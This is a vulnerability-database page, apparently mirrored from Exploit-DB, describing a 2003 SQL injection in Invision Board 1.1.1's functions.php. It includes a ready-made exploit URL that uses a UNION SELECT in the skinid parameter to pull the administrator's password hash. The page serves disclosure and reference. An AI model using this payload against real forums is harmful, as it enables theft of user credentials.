Invision Board 1.1.1 – ‘functions.php’ SQL Injection

16次阅读
没有评论

Invision Board 1.1.1 – ‘functions.php’ SQL Injection

漏洞ID 1053811 漏洞类型
发布时间 2003-04-05 更新时间 2003-04-05
Invision Board 1.1.1 - 'functions.php' SQL InjectionCVE编号 N/A
Invision Board 1.1.1 - 'functions.php' SQL InjectionCNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22461
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7290/info

An input validation error has been reported in Invision Board which may result in the manipulation of SQL queries. This vulnerability exists in the functions.php script file.

An attacker may be able to exploit this vulnerability by manipulating some URI parameter to include malicious SQL commands and queries which may result in information disclosure, or database corruption. 

http://www.example.com/index.php?skinid=99+AND+s.hidden%3D0+UNION+SELECT+s.*%2C+t.template%2C+c.password+FROM+ibf_skins+s+LEFT+JOIN+ibf_templates+t+ON+%28t.tmid%3Ds.tmpl_id%
29+LEFT+JOIN+ibf_members+c+ON+%28c.id%3D1%29+WHERE+s.sid%3D1+AND+s.hidden%3D0

相关推荐: Oracle Oracle9iAS Web Cache HTTP Header DoS Vulnerability

Oracle Oracle9iAS Web Cache HTTP Header DoS Vulnerability 漏洞ID 1102826 漏洞类型 Failure to Handle Exceptional Conditions 发布时间 2001-10-…

正文完
 0